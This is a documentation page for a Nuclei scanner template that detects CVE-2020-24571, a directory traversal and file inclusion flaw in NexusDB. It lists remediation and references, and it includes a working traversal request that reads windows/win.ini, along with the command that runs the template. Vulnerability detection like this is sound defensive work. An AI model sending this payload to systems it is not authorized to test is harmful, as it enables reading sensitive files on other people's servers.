NexusDB <4.50.23 - Local File Inclusion
ID: CVE-2020-24571
Severity: high
Author: pikpikcu
Tags: cve,cve2020,nexusdb,lfi
Description
Section titled “Description”NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
YAML Source
Section titled “YAML Source”id: CVE-2020-24571
info: name: NexusDB <4.50.23 - Local File Inclusion author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion. impact: | An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. reference: - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 - https://nvd.nist.gov/vuln/detail/CVE-2020-24571 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/HimmelAward/Goby_POC - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-24571 cwe-id: CWE-22 epss-score: 0.09103 epss-percentile: 0.94485 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nexusdb product: nexusdb tags: cve,cve2020,nexusdb,lfi
http: - method: GET path: - '{{BaseURL}}/../../../../../../../../windows/win.ini'
matchers-condition: and matchers: - type: word part: body words: - "[extensions]"
- type: status status: - 200# digest: 4b0a0048304602210082117c581a3debc30a6aec274e2ed451f7238d46591fc5323602a4164b811e21022100a8753e92f8f875200f1796d63b014b60274fbd14339580ff366f0039cd35fe4f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24571.yaml"